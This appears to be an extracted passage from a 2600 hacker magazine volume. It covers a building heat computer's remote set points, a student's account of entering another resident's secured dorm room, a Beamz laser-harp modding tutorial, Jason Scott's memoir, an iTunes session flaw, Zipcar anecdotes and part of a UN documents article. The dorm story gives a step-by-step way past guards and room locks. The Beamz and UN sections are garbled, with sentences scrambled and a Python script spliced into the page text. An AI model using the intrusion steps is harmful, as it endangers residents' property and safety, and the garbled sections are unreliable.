is an instant process. BAT reports the amount of time that the heat computer has been operating on battery backup. It appears as if the current outside temperature is the lowest in two weeks. High aquastat temperature (H-A), high/low domestic hot water temperature (H-W, L-W), highest stack temperature and boiler water consumption are daily reports as opposed to the current ones seen above. The redundancy here is simply to facilitate expediency in quick reference of this particular section of the report analysis.

Set Points

True to the OAS advertisement pitch of “Be A Control Freak,” several attributes (henceforth referred to as “set points”) of the heat computer may be remotely programmed–this is the venue through which the title of this article may be literally applied. Set points are as follows:

    MODE: S
    TIME SET POINTS              DIAL OUT
    DAY       5:30A              ALARMS___MAL_AQS_DHW_BYP_APT_ADC__A7__A8_
    EVENING   6:00P              ENABLED:   N   N   N   N   N   N   N   N
    NIGHT    10:00P              AQS 120   A7 .
    TEMPERATURE SET POINTS       DHW  90   A8 .
    INSIDE   DAY      69         1. 1917XXXXXXX
             EVENING  69         2. 1800XXXXXXX
             NIGHT    65         3. 191XXXXXXXX
    ATH 0                        4. *XXXXXXXXXXX
    OUTSIDE  DAY      55
             NIGHT    40
    SUMMER/WINTER  W
    AQUASTAT  DAY  NIGHT  DIF
              190  190    10

Time set points define for the system “day,” “evening,” and “night” by minimum hour. Thus, then, the period of time from 5:30 a.m. to 6:00 p.m. would be considered “day,” from 6:00 p.m. to 10:00 p.m. is “evening,” and so forth. The importance of establishing and defining these categories lies in the fact that the OAS determines cutoff temperatures by the time of day. Temperature set points, as seen here, are the temperatures at which, when sensed by thermistors, the boiler will initiate procedures to actively heat the building. Case in point, the temperature set point for this particular system means that this individual system will cease to heat the building actively if the inside temperature during the period of time defined as the day reaches 69 degrees. As the system is incapable of heating the area outside of a building, heat will be provided if a majority of outside cutoff temperatures are logically opposite the inside–therefore, 55 and 40 degrees. The precise purpose and effect of summer/winter mode is unknown and absent from the technical specifications of other versions including the 3500. A reasonable assumption, however, is that summer operation involves the toleration of lower maximum aquastat and cutoff temperatures without activating an alarm by default, since the outside temperatures are obviously expected to be higher. Under “aquastat” are the temperature settings with a permitted differential of ten.

Dial out and alarm conditions follow–the computer will generate an alarm message in the instance of a burner malfunction, an aquastat temperature below the specified minimum (120 degrees, here), excessively low domestic hot water temperature, system bypass, a disconnected area sensor (if the heat computer is administering an apartment building), and/or an analog-to-digital converter error. A7 and A8 are additional generic alarms that may be connected to external devices. The OAS will dial the numbers listed and leave an automated message, emergency page (if a beeper/pager number is specified) or electronic message (if sent to a modem), with the alarm time and status. Alarms MAL through BYP will dial out after five minutes of the persisting condition, APT after ten, and ADC after forty. This is only logical as analog-to-digital converter and apartment sensor errors are far more likely to be resolved automatically with system resets and other automatic measures, as they concern the machine and not the actual heat or hot water in the building, and it is not absolutely vital that the building manager be made aware of them immediately. Despite what may be believed to the contrary, the terse list of phone numbers is NOT a directory of dialups to other units (the number following the asterisk is the dialup for the unit to which the user is connected) nor is it a log of the last four numbers to dial in. Instead, these numbers, possibly including personal numbers, could merely be those of people or other places that the owner of the computer has contact with and access to. Remember that the purpose of this feature is to notify those in charge of the building, who are most likely responsible for remote programming of the system as well, of alarm conditions. Often these numbers will seem rather random and unrelated when called; it would do little good to have the computer call the main number(s) of the building itself to report problems. In fact, the author of this article knew that the number of this particular unit was registered to a certain establishment, here called “Jones Financial”. Upon calling one of the numbers listed, an answering machine picked up with the greeting, “You’ve reached the Joneses.”

This article will be concluded on page 135

The Best of 2600: A Hacker Odyssey 600-page hardcover book now being sold at booksellers worldwide including Barnes & Noble, Borders, and http://amazon.com/2600

Security: Truth Versus Fiction

by RussianBlue

In a world with cable news, internet, and search engines, we are provided with an almost live account of all the terrible things that our world is riddled with: violence, pain, and fear. With this constantly reinforced feeling of danger, safety and security become precious commodities. But while corporations tout products designed to make you safer, one must wonder: how much do fancy security measures matter? Is there a way to break the system, even in the face of overwhelming efforts to cover every crack and patrol every corner? As advanced as they are, can these systems be beaten? This is the way hackers think. Constantly we consider and reconsider the effectiveness of security systems; we look under every rock and peer into each nook and cranny to find that one tiny weakness which, given careful management of circumstances, compromises the system. Often, however, it is a system of tiny flaws compounding each other that creates a little doorway through which the canny individual can squeeze and thereby penetrate what many would think impregnable. Let me supply my own story of a simple series of seemingly negligible flaws that added up to create a massive failure in the overall scheme of an establishment.

I am a university student living in a campus residence. The building in which I live was converted from a hotel to a student living area. A major selling point for the residence is its security, sought after for a premium. Students pay a premium for this security, as this particular residence is probably the most expensive on campus. To get to the elevators in the main level, one must show an access card to the security guard who keeps 24-hour watch. If you are in the elevator, you need to swipe the card to go to a level where students reside. To get into the room, you need to swipe your access card. Each level has an individual who takes care of any reported security issues, such as intruders or suspicious activity. This looks, on paper, like a very good system and no doubt ensures safety. But is this security worth paying extra? As educated hackers, I have no doubt you’re already looking for ways to get around the various security systems. I have done the same. Though I do not recommend trying to access someone’s residence without their permission at any time, I “broke in” to a room on a different level than my own. Please understand that I did so without malicious intent and only to prove that the system was flawed. Let me assure you, these little flaws go mostly unnoticed by people who aren’t looking for them, but a hacker is someone who not only knows where the flaws can be found, but also how to master their intricacies and achieve a desired end: in this case, to beat the system.

The first challenge that I faced was the necessity of accessing elevators. Theoretically, one must somehow gain access to the elevators before they can even begin to penetrate the system. The solution to this problem, I discovered, was in the lower level. This story begins on ground level. While on the ground level, there are stairs that go one level down to the mail room and laundry rooms. In the main area, the stairs are right next to the security station. These stairs are actually concealed from security’s view and therefore provide a free pass around the desk. To get into the mail room, you have to swipe the same card. The basement area, however, doesn’t have security, so you can traverse freely from the main level to the basement. The main elevators also go directly down to the basement level, a convenience for residents but a security flaw that adds to the pile. This means that you can get into the elevators from that level without security knowing. Alone, this is a huge security flaw in a place that touts student security as a main priority.

The next issue is getting onto the level you’re looking for. To access a level of student rooms, one must swipe their access card. No card, no access. People are not allowed on levels 2 or 3, which are used for conferences, and therefore inaccessible to people without proper credentials. Thus, the stairs up are inaccessible, so they were not an option. This part is more a matter of timing. Theoretically, a student would want to go to the same floor as you and punch it in, or you might be able to hit the button while their swipe was still active, if you were lucky. I decided to try for a method that would work every time. There is, however, a simple solution. The elevator does allow non-swiped service to several levels usable by all students and staff including the ground floor, the basement area, the student lounge, laundry room, or dining area, and an entire floor deemed the student lounge: the second-highest floor in the building. Once again, without a pass, you are free to traverse the floors above the conference levels by way of the stairs. Combine this with the previous way to access the elevators and student lounge, and you have a ticket to every level in the building that you could possibly care about.

What has not yet been discussed, however, is what to do once on the targeted floor. To get into the room, one must swipe their access card. Again, no card, no access. Clearly posted by the elevators of each floor is the cleaning schedule for the rooms. It tells you what day the cleaning service comes by to clean the bathroom in each room, an obvious security flaw. They only do the bathroom and a quick vacuum. It takes cleaning about ten to 15 minutes to do a room, but most students are either in classes or clear out of the room for a few hours when it’s cleaning day. If you want a quick peek into the room, just walk by and you get your glimpse. If you want access, you need only to catch the cleaners as they are finishing up. Again, they won’t really bother you, but as long as you’re patient, you can get it right. If you get into the room as the cleaners are leaving, you will likely have access to the room for as long as you need it.

Some of you are probably asking why I was not caught by the floor’s other residents, or why the cleaning ladies didn’t know that it wasn’t my room. The building has almost 1000 residents, and each of these staff members sees over a hundred faces going in and out per day. This rather foils the idea of people being able to simply recognize a stranger, given that many of the people who do live here are new to them every day. The rooms don’t have safes. People move things in and out all the time; you need only a box to take it out, and, as a stranger, nobody will think twice about it. Thus, documents or possessions could conceivably be taken. It makes no sense that in a building that has 24 hour security I was able to access a particular room with only a couple of days of patience and a brain. There was no trick key, and there were no tools involved, but it would be child’s play to do something more malicious. Obviously the security is not as effective as the residence suggests.

This brings us to an important question which we face in modern society: are the security systems touted by this residence and that apartment really effective enough to guarantee our safety, be it security for a building or a computer program? We know that every system has its weaknesses and therefore can be broken. It would seem impossible to create a system that couldn’t be hacked. This ever-present ability to hack these systems counteracts the boasts that companies make about their security systems. Does this mean that security systems are a waste of money? Does it mean that complete safety is impossible? Does it mean that, unable to afford much of the security used by corporations and companies, even reasonable safety is out of reach for most people? These are not questions for which I profess to have answers, and there are good arguments on both sides, but they are something for every hacker to think about when finding holes in security schemes. On the other hand, while my story tells you how to break into a university residence room, I hope that you give some thought not to breaking the system, but instead to what breaking this system means. Think not only about where the hole is and what can be done through it, but what it means for safety and security as a whole.

The Beamz (available at http://...com/) is a MIDI-controlled musical instrument called a laser harp. It uses laser beams as an interface to trigger music samples with the .wav, .mid, and .wax extension. When you interrupt the laser beams with your hands, you can play any of the pre-recorded music segments. The Beamz is powered via USB. Here’s the problem: although the hardware is solid and much less expensive than other laser harps, the proprietary Beamz application is currently the only software which interfaces with the device. Unfortunately, there’s no way to modify the sound samples within the application itself. This tutorial will help you modify the sounds which the application triggers so you can edit the sounds which the device can play. Doing this, you can make the Beamz into a laser MIDI controller for your own samples.

As an example, let’s take a look at the C:\Documents and Settings\All Users\Documents\Beamz\Beamz_Music\Get’n Chilly\ directory. The following files comprise the rhythm section of the song “Get’n Chilly” in the Beamz application:

    DRUMSnBASS.wav
    INTRO GROOVE.wav
    INTRO.wav
    MAIN GROOVE.wav

The easiest way to drop in your own sample into your laser harp is by a simple .wav file swap. To do this, you need to rename the .wav files in the directory to a different extension, to back up the original samples (I use the ... extension, but you can use anything you like). If you accidentally delete a sound, the renamed original is still there to restore it. Then, substitute your own .wav file with the exact same name as the original Beamz file that you renamed. Make sure the .wav file is recorded at the exact same BPM (beats per minute) as the default BPM on your Beamz track. After editing the files as shown below, rather than playing the prerecorded Beamz sample, you will then be able to hear whatever sound you dropped into the Beamz music directory.
BREAKDOWN. As logical people. Security flaw. of locking doors at night or installing an alarm system in our homes. and thus safety. you can always restore the sounds from the Beamz software that shipped with the device.sgt formats. work. The Beamz the default location: C:\Documents and Settings\All Users ➥\Documents\Beamz\Beamz_Music First. The answer here is in the volume of people. Passports. or are they just a ploy to attract potential customers? It’s a dilemma. most of us are experienced hackers. I’m sure we can all appreciate the added security.
Hacking the Beamz
by shotintoeternity
➥thebeamz. go to the Beamz music information in
Editing Process
65
. and a proprietary application and driver control it.wav DRUMS ONLY. I only left my friend a calling card to show off the little feat. Make sure the . Just some food for thought. at $400.

com/hammerhead).wav” EndTime=”1” LoopEnd=”1” /> <Segment File=”CYM 5.wav.wav. check out music software like FruityLoops or Reason. the sound will play once without looping.THE HACKER DIGEST . By swapping these files for your own. The software uses .). In this case.VOLUME 26
To change them.
Advanced Editing
The Beamz music was originally composed using Microsoft DirectMusic Producer software. After substituting my samples with the Beamz built-in samples. This attribute is defined in the Trigger section of the tag. If you need some sources for your samples. For instance.wav” Vol=”-570” EndTime=”1” ➥ LoopEnd=”1” /> </Segments> </Region> </Regions> </Beam> The description of this Beam as “One Shot” indicates that at any point during the sequencing of the Beamz track. Ding hit. and any number of beam attributes can be changed.wav. freely available as a download from Microsoft. which indicates that a number of notes will be played and looped on that particular Beam. I recorded six different drum beats at exactly 97 BPM using some freely available drum machine software called Hammerhead (http://threechords. The files are coded in XML.wav” Vol=”-570” EndTime=”1” ➥ LoopEnd=”1” /> <Segment File=”Ding hit.HB file controls which .40000” ➥ UseTempo=”1” LockPitch=”1” Volume=”-360” DynamicChannels=”0”>
This code gives information about the Beamz track (each with its own unique GUID) to the application. along with the open-source sound editor Audacity (http://audacity.hb files located inside of the Beamz song directories.hb file starts out with an XML tag similar to the one below:
<Program UseBundle=”0” Name=”Get&apos.sgt files. and pitch – you need to edit the . Other sounds are “Pulsed” sounds. you can entirely replace the pre-made samples in the song.wav files with the built-in sounds.000000” BPM=”4” Beat=”4” Tempo=”0.wav and . whereas Groove D 8. For advanced editing of the sounds – including MIDI triggering. frequency.net/). which are very small audio sequences that contain segments of a larger file in addition to standard . you can edit the Segment File attribute to point to your own sounds. Afterwards. Groove A 4.com if you have any questions or are interested in collaborating on this project.mid files. which controls the sound the laser produces. On some songs.wav” Vol=”-370” EndTime=”1” ➥ LoopEnd=”1” /> <Segment File=”CHIMES.sourceforge. the Beam will play one of four . like “Rastafari.n Chilly” Genre=”HipHop” GUID=”9cc86704➥86cf-4b78-a2e9-721819951f27” AudioPath=”StandardMusic.000000” TempoRange=”0. I was able to completely control the rhythm of the song. Please e-mail me at shotintoeternity@gmail.wav is a four measure . When swapping your .” these beats are notated in the names of the .
66
. Data under the <Segments> tag of the . Each .wav files.wav files the Beam will trigger. etc.wav. Each attribute within the tag corresponds to MIDI data.wav files (BellTree hit. you will see code in this general format:
<Beam ID=”256” Name=”Bells N Whistles” Description=”One Shot” PulseRate=”16” PulseTriplet=”0” PulseDelay=”44” StartRate=”0” StartTriplet=”0” StepInterval=”4” StepMult=”1” Mode=”Secondary” Poly=”10” Trigger=”OneShot” Step=”0” FreeWheel=”0” Slave=”0” Master=”0” Volume=”0” TimeShift=”0” NoCutOff=”0” GroupCount=”-1” GroupID=”-2”>
<Regions> <Region Name=”Default” Title=”Bells N Whistles” Comment=”One ➥ Shot”> <Segments> <Segment File=”BellTree hit.aud” ➥ VideoStart=”0.wav is an eight measure .
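The two editing steps above (back up the original .wav files under another extension, then point the Segment File attributes at your own samples) can be scripted. The following is an added example, not code from the article or from the Beamz project: it assumes the .hb file is plain XML of the shape shown in the listing, uses a constructed Beam fragment modelled on "Bells N Whistles" as input, and exercises the rename step on a throwaway directory of placeholder files.

```python
"""Script the Beamz sample swap described in the article (added example,
not the Beamz project's own code).  Assumes an .hb file is plain XML with
<Beam>/<Regions>/<Region>/<Segments>/<Segment File="..."/> as printed above."""
import os
import shutil
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample .hb fragment, modelled on the article's "Bells N Whistles"
# Beam (straight quotes; the printed listing used typographic ones).
SAMPLE_HB = """<Beams>
<Beam ID="256" Name="Bells N Whistles" Description="One Shot" Trigger="OneShot">
<Regions>
<Region Name="Default" Title="Bells N Whistles" Comment="One Shot">
<Segments>
<Segment File="BellTree hit.wav" Vol="-370" EndTime="1" LoopEnd="1" />
<Segment File="CHIMES.wav" Vol="-570" EndTime="1" LoopEnd="1" />
<Segment File="Ding hit.wav" EndTime="1" LoopEnd="1" />
<Segment File="CYM 5.wav" Vol="-570" EndTime="1" LoopEnd="1" />
</Segments>
</Region>
</Regions>
</Beam>
</Beams>
"""


def segment_files(hb_xml):
    """Return the .wav names a Beam will trigger (its Segment File attributes)."""
    root = ET.fromstring(hb_xml)
    return [seg.get("File") for seg in root.iter("Segment")]


def retarget_segments(hb_xml, mapping):
    """Point Segment File attributes at your own samples.

    mapping: {original name: replacement name}; unmapped segments are untouched.
    Returns the rewritten XML as a string (write it back over the .hb file)."""
    root = ET.fromstring(hb_xml)
    for seg in root.iter("Segment"):
        name = seg.get("File")
        if name in mapping:
            seg.set("File", mapping[name])
    return ET.tostring(root, encoding="unicode")


def back_up_wavs(song_dir, backup_ext=".wax"):
    """Rename every .wav in song_dir to backup_ext so the originals survive the
    swap (the article's manual step).  Returns the backup names, sorted."""
    renamed = []
    for name in sorted(os.listdir(song_dir)):
        base, ext = os.path.splitext(name)
        if ext.lower() == ".wav":
            os.rename(os.path.join(song_dir, name),
                      os.path.join(song_dir, base + backup_ext))
            renamed.append(base + backup_ext)
    return renamed


def demo():
    """Run the whole swap on a temporary directory of placeholder .wav files."""
    song_dir = tempfile.mkdtemp(prefix="beamz_demo_")
    try:
        for name in segment_files(SAMPLE_HB):
            with open(os.path.join(song_dir, name), "wb") as f:
                f.write(b"RIFF")  # placeholder bytes, not real audio
        backups = back_up_wavs(song_dir)
        new_xml = retarget_segments(SAMPLE_HB, {"CHIMES.wav": "MY CHIMES.wav"})
        return backups, segment_files(new_xml)
    finally:
        shutil.rmtree(song_dir)


if __name__ == "__main__":
    print(demo())
```

Only the File attribute is rewritten; Vol, EndTime and LoopEnd are left as the track shipped, so a replacement sample still plays at the original level and loop setting.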

Hacker Perspective
Jason Scott

I am nearly 40 years old, but I feel like I have lived several lifetimes, multiple distinct capsules of being and knowing, each quietly coming to a close with a physical or mental move into a new direction; my siblings and I do not share the same accents in our voices. Through it all, machines of plastic and metal and glass have guided my direction, given me sustenance and comfort, and driven me to come out of various shells that sometimes I didn't even know I had been disguising myself in.

From the moment my father, working at IBM's research center in upstate New York, brought home what passed for a home computer, it was obvious which one of the three children would make them his life. In 1978, these computers were borrowed from work as you might sign out a rare book or artifact, a between-the-cracks forgotten item from work. The Commodore PET, a machine bursting with 8k of memory to write programs, and a black and white screen barely five inches across. With a cassette drive that relied on audio signals to transfer a program over a matter of minutes, I recall an Atari game that would take 20 minutes to load by cassette. After a dozen or so of these lends, one stayed permanently. Computers it was, and computers it is. It was obvious that I was never looking back to any other choice in life, the forking of our daily lives and my attachment to this machinery and way of life being so total and complete. I never did.

"Once you get a floppy drive, you'll never go back," said the wonderful man who ran the local computer store who I befriended. And he was very right. Even now in the dusk and sunset of the floppy disk, the feeling of holding a solid piece of plastic in my hand and knowing information was on it is still strong in me. I could walk around with whatever-you-please on those floppies. And the weekend visitations I would make to my father's house, now nearly empty from a divorce, were centered around which new item he'd be able to bring to my attention, be they games, programs, or writings typed out and transferred via phone line to other waiting floppy disks inside floppy disk drives that would write their payload with a churning, remembered-years-hence grind.

To speak of "transferring," however, is to bring back a flood of memories, of phone numbers dialed in the dark of night, hoping beyond hope that a busy signal wouldn't respond, that I'd hear the click of relay that meant a machine, a person that I would likely never meet, was providing me a terrible screech of a carrier that meant it was my turn, my solitary turn, to connect to another person's computer. Modems, able to connect and transfer data via telephone lines, were miraculous things, but they did so very slowly. I feel the hardest thing to translate from these old memories is the sense of time, the distances of minutes that were an expected aspect of the experience at the time. But maybe this is one of the biggest mistakes that people make when they look back at the era I was a part of: meeting was fundamental! It was so much easier just to find a way to travel the distance, meet the people, trade, and duplicate there in person. Some of my finest memories of that time are not of cards successfully installed, games finally beaten, or messages successfully written. It's of parties I had my father drive me to to meet online friends, of careful negotiation of the train system to arrive at a mall in White Plains to quietly wait for friends to arrive at the appointed time, a trip into then-scary New York City. I remember aimless walks through neighborhoods and streets, talking of all things technical, occasionally misrepresenting my knowledge or having others misrepresent theirs. It was, all told, a muddling, growing sense of self-worth and character that would only strengthen as disk-copying friends became best friends. And I recall a meeting in the Citicorp Center in 1987. At the time, I was a 16-year-old "hacker," wide-eyed and nervous, standing among kindred spirits, one of them calling himself Emmanuel Goldstein and heading out to a Chinese dinner afterwards, my scant funds barely able to pay my part of even this inexpensive meal.

The "hacker" nomenclature, I might add, was something I picked up from media and what I read. I called myself a hacker simply because it was the word that fit, which I fashioned on my breastplate and used to shock and ally. I didn't know at the time the long history the spirit of it had or when it truly became a synonym of evil. All I knew was that it felt right. That is what mattered. It still does. It was a word that felt like an adjective, a verb, a noun, a theme, a medal, a word that got attention and which I felt applied to me. I still do. It felt like a song. The word served me well, and in no short time it became the way many people knew me, and formed the backbone of my online identity. I could tell you what "hacking" is, in a general sense, but realize that "hacking," in the end, is just a word, a shorthand to try and reach out to others like yourself and begin a conversation. But the conversation, and the humor, horror, and inspiration that comes from reading missives from another like-minded soul, these are what drive me to keep my eyes open.

Once upon a time, information was meager. Imagine a single Google search that was a day's trip. I'd take commuter rail trains to libraries in larger towns, poring over paper copies of The Readers' Guide to Periodical Literature to find some mention, any at all, of hacking, computer information, or bulletin board systems, that would be of interest to a computer-obsessed person who wanted to know what was out there, out beyond his seemingly tiny realm of mastered knowledge. A fruitless search, then, and a wasted afternoon save the paperback novel I'd read on my long trip back home. But when information became available to me, via the bulletin boards (computers with modems attached, really), I'd save it. I'd print it out, store it to one of my beloved floppies, and later keep them at hand on the many-thousands-of-dollars hard drive I had, again a lend from IBM by my father, providing me ten megabytes of storage for whatever shook my fancy. Hard drives, as they entered the homes of my friends and myself, barely counted up to 40 megabytes. We'd sit on the phone and scope out the future expansion of information we'd be able to sustain on these monsters. These hard-won, slow-downloaded, carefully traded pieces of text, which we just called textfiles or general files or texts and later textz, were like being given the keys to a city. And whether I sought knowledge, or friendship, or attention, to know the next new thing, the story is where the treasure is. Information, that is.

They had taken me years to collect. I kept them, these writings and programs and captures and printouts, these talismans of information, and let them follow me through my capsules of living, of college student and temp worker and art director and system administrator. They stayed in the back of my mind, awaiting each new set of folks to come across them. And in my 28th year, I browsed around what seemed to have been an infinite collection of information on the Internet, and found these files had not survived the trip. So I brought them online, from my backups. I sorted them, as I read them for the first time 20 years ago. This was textfiles.com, a collection of historical documents from most of the networked life of computers, to hundreds of thousands of people a month, either by laptop or mobile phone or inkjet printing or whatever brings the words to you. To some who are my age, these are memories, nostalgic guideposts to their own childhoods and early adulthoods. Others read these files for the first time, with no expectations. A week barely goes by, I am pleased to note, without some handful of what might be called fan letters, people writing me to thank me for thinking to collect these artifacts of my youth. For me, the spirit of what I call "hacking" is buried in those files.

For my grandfather, an immigrant who had lived through some terrible times and had many close relatives lost in war and holocaust, life was the way it was. As my father was growing up in the 1940s, his father would unnerve him by simply watching him eat dinner quietly, not taking his own food but just watching his son eat. Just the sight of his own son eating as much as he cared to and facing a life ahead was pleasure itself. My father could understand this, but he himself had not been through war and did not know loss to such a level. For my father, his own happiness was seeing his children grow up in the 1970s and 80s with their own removed boundaries: the delight of suburban space in a beautiful countryside, the inexpensiveness of air travel. For me, it is the delight of seeing the next generation grow up in a world where screens can be touched and react accordingly, where devices hanging off key chains can contain the entirety of my 1980s collection of information, where one glance at a device in their pocket and they know exactly where they stand and not know the fear of being truly lost. That's what matters now, when all of us were swept into this wave of technology and changed ourselves forever: to remember the old but not be trapped by it, and I think I've done a bit of that here.

Jason Scott is the webmaster behind textfiles.com. He is also the director of "BBS: The Documentary," a Creative Commons licensed documentary on the history of the bulletin board system.

Hacker Perspective is a regular column featuring the views of various luminaries known to the hacker community and oftentimes the mainstream as well. In the past, we've featured commentaries from:

The Cheshire Catalyst
Bruce Schneier
Phiber Optik
Barry Wels
Nick Farr
Bre Pettis
Mitch Altman
Rop Gonggrijp
Bill Squire
Phillip Torrone
Virgil Griffith
Martin Eberhard

We want this list to grow even bigger. Is there a person you're aware of who is a known entity and has made a noteworthy accomplishment of some sort that would be recognized by the hacker community? Do you feel this individual would have something of interest to say about what it means to be a hacker? If so, then let us know and we will try to entice them into writing the next Hacker Perspective! Email us at articles@2600.com with details.

iTunes Stored Credit Card Vulnerability
by Brendan Griffiths

A little background: About three weeks ago, my laptop was stolen. A day after the computer went missing, I started to get bills from iTunes for songs I hadn't purchased. Whoever had possession of the laptop was purchasing songs through the iTunes store, because I had enabled the one-click download feature. I immediately contacted iTunes support (which is only available by email and took more than 48 hours to respond). They suggested I cancel the credit card linked to my account and change my password, both of which I did immediately. For a couple of weeks, everything seemed fine. Then, I added my new credit card number to my account. Immediately, new bills started to come in from the iTunes store, again for songs I never purchased. I was billed for a backlog of songs that had been purchased while my previous card was inactive. Again, the answer from iTunes support was that these purchases must have been made before I changed my password, but that I should have my credit card reissued again, just to be safe. After calling Apple's customer support line several times, I was able to reach someone in the iTunes store who told me that there was no way that someone with a stored password would be able to make purchases once the password had been changed on my end, and that my account was now secure. Assuming that, with the password changed, the thief would no longer be able to continue purchasing songs, I was able to add my new credit card to the account, and no additional fraudulent purchases were made over the past few days.

Not believing them, I decided to test it myself, using a second computer. Here's how to test this: Log yourself into iTunes on two separate computers, and make sure that you have the one click or click-to-buy option turned on. Download a song or two on both. Now, on one of the computers, go to the account settings page and change your password. On the other computer, try downloading a song. You will see that it downloads without a problem, even without entering the new password. You can even try quitting iTunes, restarting, etc. You will always be able to download songs from the second computer, even though the password has been changed.

So here is the big security hole: once you are logged in to the iTunes store, and have the one-click purchase option turned on, there is absolutely no way to stop downloads from being charged to your account. Even Apple seems unable to stop them. Thankfully, my credit card company reversed all the charges from iTunes, so this ordeal hasn't cost me anything financially. However, it has been an incredible hassle and waste of my time. Clearly, this is a major security issue that, for whatever reason, Apple is completely unwilling to recognize or fix.

Zipcar's Information Infrastructure
by IntlOrange

Zipcar is the largest car-sharing company in the country. To those unfamiliar with Zipcar's car-sharing model, it works like this: Customers pay an annual membership fee (around $50) in exchange for access to Zipcar vehicles, which are parked in designated spaces in urban areas. In addition to the annual membership fee, customers are charged an hourly rate for using the vehicles, which ranges from $8.50 to $10.50 an hour, depending on the car's cool factor (Mini Coopers are most expensive) and gas mileage (Priuses are cheapest). The hourly rate includes the cost of gas and mileage up to 180 miles, after which there is a per-mile surcharge. (There's a gas card in the visor that you can use to fill up when needed.) Also, when booking for a 24-hour period, a special all-day rate is used, which is about $70-$90. Reservations may be for as little as one hour or for multiple days. In short, it's much less expensive and far more convenient than regular car rentals when you only need a vehicle for short periods of time every so often.

Cars must be reserved in advance (although it could be as little as one minute in advance), and reservations can be made by phone or online, through the website or a stripped-down mobile interface. To access the vehicle, you hold your RFID membership card over a sensor installed on the driver's side of the windshield. The car verifies that you have reserved it for this time, and it unlocks all its doors, officially starting your reservation. The keys are already in the car, tethered to the steering column. (A $50 late fee discourages tardiness.)

Zipcar is a great deal, and, while their marketers promote the size of their fleet, I'm more interested in the hidden information infrastructure that makes it all possible. Reluctant to do anything that could jeopardize my membership, I've made some inferences about how their systems work without resorting to hacking any of their hardware (i.e., damaging vehicles). These stories of "edge cases" should illuminate some of their systems' inner workings.

One time, I lost my Zipcard, and I was locked out of my vehicle in rural Western Massachusetts. I called 866-4ZIPCAR, where a friendly voice verified my identity (asking for name, Zipcard number, DOB, and address) and then - ka-chunk! - instantly unlocked the car. Yes! That was all I needed, but the rep directed me to the trunk. In the area near the spare tire, there was a stack of new Zipcards. I chose one and read her the six digit code on it. She linked that card to my account, deactivated the old one ("so you're all set"), and I was back on the road like nothing had happened. (I expect to be charged some fees for service rep assistance and a replacement card, of course, but the bill hasn't come through yet.) The fact that their reservations system communicated so quickly with my vehicle in a remote area tells me that whatever wireless protocol they're using isn't cellular.

Another instance of over-the-air magic occurred when I arrived at my Toyota Matrix only to find it completely scratched, dented, and missing a hubcap. I called Zipcar, and, after a few minutes of collecting my description of the damage, they reassigned me to another car ten feet away, which unlocked with a wave of my card. Great.

During another recent reservation, I went to pick up my reserved Zipcar, but the member before me hadn't yet returned it. I patiently waited for 15 minutes, and, just as I pulled out my phone to report the tardiness, the black truck roared into its designated parking space - with two enormous couches still in its bed. WTF? The dude gets out, apologizes, and asks me to help him unload the couches. Apparently, he was running late and hadn't been able to complete his move, and it was getting late. He asked if I'd reported that he was late yet, and I said no. I asked him to lock the truck by tapping his Zipcard to the RFID Reader so I could then unlock it with my own card. He basically refused to "check out" of his reservation, explaining that "If they don't know when I returned it, then they won't charge me the late fee." I didn't have time to argue at this point, so I just took the truck, returned it an hour later, and locked it using my card. You see, until you lock the car with your card, the clock is still running on your name. Mr. Late Driver was "on the clock" until I locked up at the end of my reservation. I called Zipcar later to tell them what happened, and they confirmed that, yes, they cannot be outsmarted. So, in this case, he was charged for his reservation, plus $9 for my hour of driving, plus a $50 late fee. (I still had to pay for my hour, too, which is unfortunate for me, but a win-win for Zipcar.)

The one part of Zipcar's infrastructure that's not so magical is their billing system. My normal annual membership cycle runs from December to November, but the last time I relocated (from San Francisco to Boston in June), I spotted the $50 "annual" fee on my credit card statement. An email to Zipcar elicited the response that it is their policy to re-charge the annual fee when a member moves to a different area.

I hope these stories have gotten you thinking about all the technology behind the scenes at Zipcar. Happy car sharing!

he became designated a “good” guy in 2006. Security Council transcripts have the document code S/PV. That means that if you click on a link to one of these documents from within the United Nations website. and to whom they are happy to transfer the associated unpopularity that comes from implementing that policy. which has been covered ad-nauseam by the paid-for newsstream. we think of the United Nations as a remote organization which puts representatives on the ground in the third world. I am not qualified to elaborate on these cases. In 1999. or the WTO) over which they have effective control. That was back when Qadhafi was a “bad” guy. England were raided by police in relation to a UN mandated financial sanctions regime. This regime was set up to “target entities associated with Al-Qaeda. doing the research that mysteriously has gone out of fashion just when. but if you put the URL directly into your browser. There is a theme in politics whereby governments intentionally launder somewhat questionable policies through a supranational organization (such as the EU. These documents are in PDF form. In the early years of this regime.1234 (the enumeration is from the first meeting of the Council on the 17 January 1946 in London. If you object to the UN. But back in 2006. it’s never been easier. Yet when that collapses. I mean questions that we should all be digging into in detail. turning them into a beggar to whom it is illegal to give any money to. there will be a great deal of unnecessary suffering and death. Both of these produce verbatim transcripts of their official meetings and tables of the votes by member nations on any issue. and you cannot link to them on-line because they are referrer blocked.THE HACKER DIGEST . and pals around with heads of state in the developed world. Suddenly. except to note that the individuals arrested were alleged to be associated with the Libyan Islamic Fighting Group. Nafta. 
the military junta who has just seized power in your own country probably doesn’t rate the maintenance of the capitol’s water supply high up on its list of priorities. you are missing the point. your URL bar in your browser appears to do a little dance and until it winds up with a completely different URL that works on your computer and on no
71
. a number of properties in my home city of Liverpool. what they’ve done is more complicated. such as whether there is going to be enough food to survive in the next decade–which is a scary prospect because history has only ever been written by the folks who got by. which leads to even greater sorrow.” It is implemented through a consolidated list of named individuals and organizations (posted on-line as a database dump) with whom it is punishable by law to have any unauthorized financial dealings.N. The point is that the human race–as densely populous on this planet as it is–desperately needs a world organization that is capable
of looking out for its long-term survival interests. in the spirit of the infamous “No Fly” lists. The alternative to supporting the existence of internationally respected civilian agencies who act in the human interest is to leave this job open to Economic Hit Men. General Assembly transcripts have the document code A/62/PV. And I don’t mean the fake corruption of the Oil-for-Food so-called scandal. But just because an organization is essential doesn’t mean it’s not politically corrupt and wide open to misuse by the stronger powers. or link to it from a blog. It is quite clearly an extra-judicial process. you’ll get an error. This group may have been supported by the British secret service MI6 during an assassination attempt against Colonel Moammar al-Qadhafi in 1996. meeting 100). For example. These interests are basic and technical.
by Julian Todd
